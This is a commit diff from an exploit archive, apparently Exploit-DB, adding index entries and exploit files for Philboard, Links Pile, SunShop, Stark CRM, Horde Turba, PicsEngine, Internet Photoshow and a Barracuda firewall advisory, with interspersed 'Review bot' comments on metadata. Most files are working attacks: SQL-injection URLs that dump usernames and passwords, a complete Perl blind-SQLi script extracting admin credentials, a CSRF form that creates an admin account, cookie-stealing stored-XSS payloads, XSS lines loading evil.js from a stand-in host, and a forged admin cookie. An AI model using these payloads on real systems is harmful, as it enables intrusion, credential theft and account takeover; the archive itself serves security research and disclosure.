Updated 02_22_2014

Offensive Security 2014-02-22 04:27:45 +00:00
parent 024408074b
commit 555ad2fb36
23 changed files with 1015 additions and 0 deletions


@ -28576,3 +28576,25 @@ id,file,description,date,author,platform,type,port
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0
31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0
31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80
31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0
31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 'index.php' Cross Site Scripting Vulnerability",2008-05-14,ZoRLu,php,webapps,0
31795,platforms/php/webapps/31795.txt,"Links Pile 'link.php' SQL Injection Vulnerability",2008-08-14,HaCkeR_EgY,php,webapps,0
31796,platforms/php/webapps/31796.txt,"Internet Photoshow 'login_admin' Parameter Unauthorized Access Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0
31798,platforms/php/webapps/31798.txt,"Philboard 0.5 W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0
31799,platforms/php/webapps/31799.txt,"Philboard 0.5 W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0
31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart <= 3.5.1 'index.php' SQL Injection Vulnerability",2008-05-15,irvian,php,webapps,0
31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0
31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 glossaire.php id Parameter XSS",2008-05-16,ZoRLu,php,webapps,0
31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 'send_email.php' Cross Site Scripting Vulnerability",2008-05-16,ZoRLu,php,webapps,0
31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 'base_include.php' Local File Include Vulnerability",2008-05-16,ZoRLu,php,webapps,0
31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module 'sid' Parameter SQL Injection Vulnerability",2008-05-17,Lovebug,php,webapps,0
31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 'file' Parameter Local File Include Vulnerability",2008-05-19,Lostmon,php,webapps,0
31807,platforms/php/webapps/31807.txt,"cPanel <= 11.21 'wwwact' Remote Privilege Escalation Vulnerability",2008-05-19,"Ali Jasbi",php,webapps,0
31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 'appservlang' Parameter Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 'index.php' Cross Site Scripting Vulnerability",2008-05-20,"CWH Underground",php,webapps,0
31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 'slide' Parameter SQL Injection Vulnerability",2008-05-20,"fahn zichler",php,webapps,0
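Review bot: three entries in this hunk look inconsistent with the rest of the index. The date for 31795 (Links Pile) is 2008-08-14 while the adjacent SecurityFocus-sourced entries 31793, 31794 and 31796 are dated 2008-05-14, so 08 is most likely a typo for 05. Entries 31798 and 31799 are Philboard .asp scripts yet are filed under platforms/php/webapps/ with platform php, whereas the sibling 31797 sits under platforms/asp/webapps/ with platform asp; all three should use the same platform. The id sequence also skips 31789 between 31788 and 31790, which is fine if intentional but worth a mention in the commit message.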



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users


@ -0,0 +1,319 @@
Document Title:
===============
Barracuda Bug Bounty #30 Firewall - Multiple Persistent Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1065
Barracuda Networks Security ID (BNSEC): BNSEC-2067
Video: http://www.vulnerability-lab.com/get_content.php?id=1208
View Video: http://www.youtube.com/watch?v=-yQVyik3Ggo
Release Date:
=============
2014-02-19
Vulnerability Laboratory ID (VL-ID):
====================================
1065
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by providing powerful network security, granular layer 7
application controls, user awareness and secure VPN connectivity combined with cloud-based malware protection, content filtering
and reporting. It alleviates the performance bottlenecks in Unified Threat Management (UTM) appliances through intelligent integration
of on-premise and cloud-based technologies. While the powerful on-premises appliance is optimized for tasks like packet forwarding and
routing, Intrusion Prevention (IPS), DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like virus scanning, content
filtering and usage reporting benefit from the scalable performance and elasticity of the cloud.
(Copy of the Vendor Homepage: https://www.barracuda.com/products/firewall )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities in the Barracuda Web Firewall appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2013-09-04: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-05: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-09-26: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordinated Disclosure]
2014-02-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Web Firewall 6.1.0.016 - Models: X100; X200; X300; X400 & X600
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities are detected in the Barracuda Networks Web Firewall X300 (v6.1.0.016) Appliance Web Application.
The validation web vulnerability allows remote attackers or local low privileged application user accounts to inject (persistent) own malicious script
codes on application-side of the vulnerable module.
The vulnerability is located in the firewall menu when processing to create a custom user object with manipulated create user expresson
group credentials. Remote attackers can inject script codes to the `Login Name` & `Group Match pattern text` input fields. After the inject
the attacker can save the input via add (POST Method) to execute the persistent code in the edit listing. After the first add (inject) in the
edit formular the remote attacker is also able to add the input via `add to the second selection` listing to execute the persistent code in
both listing values of the bottom page. Remote attackers are able to add the persistent injected context to the main custom user objects
module in the predefined user objects listing. The attack vector is persistent and the request method is POST. The security risk of the
persistent input validation web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.8(+)|(-)3.9.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation results
in session hijacking, persistent phishing, persistent external redirects & persistent manipulation of affected or connected web module context.
Vulnerable Application(s):
[+] Firewall (WAF) Appliance Application (X300Vx v6.1.0.016)
Vulnerable Module(s):
[+] Firewall > User Objects > Custom User Objects > Create User Object > Create User Expression
Vulnerable Parameter(s):
[+] login name
[+] pattern - Group Match
Affected Module(s):
[+] Firewall > User Objects > Custom User Objects > Predefined User Objects Listing
[+] Firewall > User Objects > Custom User Objects > Create User Object > Create User Expression (Group)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
Manual steps to reproduce the vulnerability:
1. Login with the user account to the barracuda networks web firewall appliance application
2. After the login open the firewall and switch to the User Objects > Custom User Objects > Create User Object module
3. Start creating via user expression a group
4. Include a random name for the main mask, and add your script code as payload to the login name and pattern (group match) input fields
5. Click the checkbox for the group match and click the add button to save the input
6. The code executes in the add box context itself and the group match or pattern values listing (bottom) [3 times]
7. Now, the attacker is also able to add the already injected persistent context to the main menu listing by a click of the add button to save at the bottom
8. The script code execution occurs when processing to watch the firewall_user_objects module index item listing
Note: The vulnerable values are login name (name) and pattner
9. Successful reproduce of the persistent web vulnerabilities!
PoC: firewall_user_objects - index listing
<tr style="" class="config_module_tr display oddRow" id="config_module_rowfw_predefined_user_objects_1_1"
onmouseout="if (!this.isSelected) {this.style.background=this.prevBackground;}"
onmouseover="if (!this.isSelected) {this.prevBackground=this.style.background;this.style.background='#a1a1a1';}">
<td style="width: 150px;"> </td>
<td style="width: 200px;"> </td>
<td style="width:150px"><[PERSISTENT INJECTED SCRIPT CODE!]></td>
<td style="width:250px"><[PERSISTENT INJECTED SCRIPT CODE!]></td>
<td style="width: 116px;"> </td>
</tr>
Reference(s):
https://firewall.ptest.localhost:6299/cgi-mod/index.cgi
?auth_type=Local&et=1378340277&locale=en_US&password=b9bc2762a9868729613918058ac1fb56&user=guest&primary_tab=FIREWALL&secondary_tab=firewall_user_objects
PoC: Create User Object > Create User Expression - Listing
<tr class="config_module_tr" id="config_module_row_4">
<td valign="top" width="15"> </td>
<td valign="top" width="100">Group Match</td>?????
<td valign="top" width="400"><table class="config_module IT" frame="box" id="group_match_table" rules="none" summary="Box"
cellpadding="0" cellspacing="0"><tbody><tr bgcolor="#cccccc"><td style="text-align:center;"><b>Pattern</b></td>
<td style="text-align:center;" width="20"><b></b></td></tr><tr><td><input class="" autocomplete="off"
id="group_match_pattern" name="group_match_pattern" size="30" type="text"></td><td width="20"><input class="new_button"
id="+" name="+" onclick="add_group_match_pattern()" value="+" type="button"></td></tr>
<tr class="pattern"><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td><input class="new_button" value="-"
name="0" type="button"></td>?????</tr></tbody></table><input id="pattern_group_match:yes" name="pattern_group_match" value="yes" type="checkbox">
<label for="pattern_group_match:yes" style="display:inline">All Group Patterns must match</label></td>
<td valign="top" width="120"><div id="helpbox"><b class="outlinetop">
<b class="outline1"></b>
<b class="outline2"></b>
<b class="outline3"></b>
<b class="outline4"></b></b>
<div id="contents"><div>List of user group patterns according to efficient authentication method.<br>
If the check box is cleared, only one list item may match. <b>Default</b>: Off</div></div>
<b class="outlinebottom"><b class="outline4"></b><b class="outline3"></b><b class="outline2"></b><b class="outline1"></b></b>
</div></td></tr>
... && Add
<tbody><tr bgcolor="#cccccc"><td style="text-align:center;" width="100">?????<b>Name</b></td><td style="text-align:center;"
width="100"><b>Group Match</b></td><td style="text-align:center;" width="50"><b></b></td></tr>
<tr class="pattern">
<td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td>a%20>"?????<[PERSISTENT INJECTED SCRIPT CODE!]">
</iframe></td><td><img style="cursor:pointer;" name="0" src="/images/edit.png"><input name="0" src="/images/del.png" type="image"></td></tr></tbody>
--- Request Session Logs ---
Status: 200[OK]
POST https://firewall.ptest.localhost:6299/cgi-mod/index.cgi
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[-1] Mime Type[text/plain]
Request Headers:
Host[firewall.ptest.localhost:6299]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
password=4b3c71efe69b776c7af9c2a0e44d8da6&et=1378331067&content_only=1&primary_tab=FIREWALL&new_secondary_tab=
firewall_user_objects&auth_type=Local&user=guest&locale=en_US&secondary_tab=add_firewall_user_object&ispopup=1&
parent_name=add_firewall_user_object&popup_width=530&popup_height=500]
Content-Length[237]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[group_match_pattern]
value[(PERSISTENT INJECTED SCRIPT CODE!)<]
user[guest]
password[2f156d447f2d3972ab50762e5b0f581d]
et[1378331075]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Wed, 04 Sep 2013 21:26:16 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
GET https://firewall.ptest.localhost:6299/cgi-mod/[PERSISTENT INJECTED SCRIPT CODE!]<
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[1789] Mime Type[text/html]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.localhost:6299/cgi-mod/index.cgipassword=4b3c71efe69b776c7af9c2a0e44d8da6&et=1378331067&content_only=
1&primary_tab=FIREWALL&new_secondary_tab=firewall_user_objects&auth_type=Local&user=guest&locale=en_US&secondary_tab=
add_firewall_user_object&ispopup=1&parent_name=add_firewall_user_object&popup_width=530&popup_height=500]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Wed, 04 Sep 2013 21:26:16 GMT]
Content-Type[text/html]
Content-Length[1789]
Connection[keep-alive]
Reference(s):
https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
password=a1524626db9371fd7c3db09cc21836aa&et=1378331929&content_only=1&primary_tab=FIREWALL&new_secondary_tab=firewall_user_objects
&auth_type=Local&user=guest&locale=en_US&secondary_tab=add_firewall_user_object&ispopup=1&parent_name=add_firewall_user_object&
popup_width=530&popup_height=500
https://firewall.ptest.localhost:6299/cgi-mod/index.cgi?
auth_type=Local&et=1378340277&locale=en_US&password=b9bc2762a9868729613918058ac1fb56&user=guest&primary_tab=FIREWALL&
secondary_tab=firewall_user_objects
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the match group pattern and login name input fields in the firewall_user_objects module.
Encode also the vulnerable output item listing of the pattern text and login name in the main- and edit firewall_user_objects listing to prevent
further persistent script code injection attacks via POST method request. Implement the regular alos the regular formular validation of barracuda
the the item list module.
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordinated Disclosure]
Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the regular customer panel (https://login.barracudanetworks.com/auth/login/) to update manually.
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
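Review bot: the advisory's metadata is internally inconsistent and should be reconciled before it ships. The CVSS score is 3.9 under "Common Vulnerability Scoring System" but "3.8(+)|(-)3.9" in Technical Details; the affected-product lines call the device a "Web Firewall" and a "Firewall (WAF) Appliance" while the vendor introduction describes a network firewall/UTM; and the request logs show two different hosts for what is presented as one session (Host[firewall.ptest.localhost:6299] in the POST, Host[firewall.ptest.cudasvc.com] in the GET), plus a Referer in the GET that is missing the "?" before "password=". The Solution paragraph needs a copy-edit ("Implement the regular alos the regular formular validation of barracuda the the item list module"), and the note under step 8 has "pattner" for "pattern". Separately, the pasted URLs and Referer values carry password= and et= query parameters verbatim; either redact them or state explicitly that they are throwaway lab values.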

platforms/php/webapps/31792.txt Executable file

@ -0,0 +1,170 @@
?
Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities
Vendor: IWCn Systems Inc.
Product web page: http://www.iwcn.ws
Affected version: 1.0
Summary: This is a light weight CRM which simplifies process
of managing staff, client and projects.
Desc: Multiple stored XSS and CSRF vulnerabilities exist when
parsing user input to several POST parameters. The application
allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This
can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site and/or
execute arbitrary HTML and script code in a user's browser session.
Tested on: Nginx, PHP, MySQL
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5169
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5169.php
03.02.2014
--
CSRF (Add Admin):
################
<html>
<!--
http://lab17.zeroscience.mk/testing/index.php?page=admin - Add Admin
http://lab17.zeroscience.mk/testing/index.php?page=agent - Add Agent
http://lab17.zeroscience.mk/testing/index.php?page=sub_agent - Add Sub-Agent
http://lab17.zeroscience.mk/testing/index.php?page=partner - Add Partner
http://lab17.zeroscience.mk/testing/index.php?page=client - Add Client
-->
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=admin" method="POST">
<input type="hidden" name="first_name" value="Admin101" />
<input type="hidden" name="last_name" value="Admin202" />
<input type="hidden" name="comp_name" value="Zero Science Lab" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="pwd" value="123456" />
<input type="hidden" name="phonep" value="(111) 111-1111" />
<input type="hidden" name="phoneg" value="(111) 111-1111" />
<input type="hidden" name="notes" value="Testing2 Address 101" />
<input type="hidden" name="zip" value="11111" />
<input type="hidden" name="ahv" value="11111" />
<input type="hidden" name="date" value="03.02.2014" />
<input type="hidden" name="gender" value="female" />
<input type="hidden" name="f_status" value="Married" />
<input type="hidden" name="detail" value="Testing3 personal detailz" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Stored XSS (parameter: name):
############################
POST /testing/index.php?page=add_ticket HTTP/1.1
Host: lab17.zeroscience.mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lab17.zeroscience.mk/testing/index.php?page=add_ticket
Cookie: PHPSESSID=51422dfc2ef2d3569e778d06d20c7a25
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------94321629522129
Content-Length: 592
-----------------------------94321629522129
Content-Disposition: form-data; name="name"
"><script>alert(1);</script>
-----------------------------94321629522129
Content-Disposition: form-data; name="project"
1
-----------------------------94321629522129
Content-Disposition: form-data; name="description"
ZSL
-----------------------------94321629522129
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------94321629522129
Content-Disposition: form-data; name="submit"
-----------------------------94321629522129--
Stored XSS (parameters: first_name, last_name, notes):
#####################################################
<html>
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=client" method="POST">
<input type="hidden" name="first_name" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="last_name" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="comp_name" value="Zero Science Lab" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="pwd" value="test" />
<input type="hidden" name="phonep" value="(111) 111-1111" />
<input type="hidden" name="phoneg" value="(111) 111-1111" />
<input type="hidden" name="notes" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="zip" value="00000" />
<input type="hidden" name="ahv" value="test2" />
<input type="hidden" name="date" value="03.02.2014" />
<input type="hidden" name="gender" value="male" />
<input type="hidden" name="f_status" value="Single" />
<input type="hidden" name="detail" value="test" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Stored XSS (parameters: insu_name, price):
#########################################
<html>
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=add_insurance_cat" method="POST">
<input type="hidden" name="insu_name" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="price" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Stored XSS (parameter: status[]):
################################
<html>
<body>
<form action="http://lab17.zeroscience.mk/testing/index.php?page=add_status" method="POST">
<input type="hidden" name="status[]" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
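Review bot: the CSRF section's HTML comment lists five endpoints (page=admin, agent, sub_agent, partner, client) but only the page=admin form is given and the Desc never says which of the five were confirmed, so either drop the unverified ones from the comment or list them as affected in the prose. The bare line "03.02.2014" is ambiguous (files.csv records this entry as 2014-02-20) and should carry a label and an ISO date. Minor: the file starts with a stray "?" character, which looks like encoding residue from the original and should be stripped.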

platforms/php/webapps/31793.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29213/info
Horde Turba is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Turba Content Manger 2.1.7 is vulnerable; other versions may also be affected.
1-object%5Bemail5D= "><script
src=http://www.example.com/scripts/evil.js></script>
2-object%5Btitle5D= "><script
src=http://www.example.com/scripts/evil.js></script>
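Review bot: the version and product name do not agree with the index entry: files.csv lists this as "Horde Turba 3.1.7" while the text says "Turba Content Manger 2.1.7" (also "Manger" for "Manager"). One of the two should be corrected so the index and the file describe the same release. The two PoC lines are also labelled only "1-" and "2-" without saying which page or form the object[email] and object[title] parameters belong to; a short line naming the affected script would make the entry usable for triage.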

platforms/php/webapps/31794.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29214/info
PicsEngine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PicsEngine 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/1_0/admin/index.php?l=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29223/info
Links Pile is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*

platforms/php/webapps/31796.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29227/info
Internet Photoshow is prone to a vulnerability that can result in unauthorized database access.
Attackers can exploit this issue to gain administrative access to the application.
Internet Photoshow Special Edition is vulnerable; other editions may also be affected.
The following example code is available:
javascript:document.cookie = "login_admin=true; path=/";
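Review bot: the summary says the issue "can result in unauthorized database access", but what the PoC shows is the application trusting a client-controlled cookie (login_admin=true) for its administrative state, i.e. an authentication bypass rather than database access, which is also what the index title "'login_admin' Parameter Unauthorized Access" says. Reword the first line to say that the admin check relies on a cookie the browser can set, and add that the fix is to keep the authentication state in the server-side session rather than in a client-writable cookie.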


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?id=1+union+select+(password),username,password,password,4,1,1,1,null,1,password,password,password,password,password+from+users

platforms/php/webapps/31800.pl Executable file

@ -0,0 +1,101 @@
source: http://www.securityfocus.com/bid/29241/info
SunShop Shopping Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SunShop Shopping Cart 3.5.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : irvian.info@gmail.com
print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";
if (@ARGV < 5){
die "
Cara Mengunakan : perl $0 host option id tabel itemid
Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
\n";}
$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];
if ($option eq 1){
syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}
for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 57)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";
sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];
if ($op eq 1){
$klm = "username";
}
elsif ($op eq 2){
$klm = "password";
}
my $ua = LWP::UserAgent->new;
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
my $res = $ua->get($url);
my $browser = $res->content;
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}
}
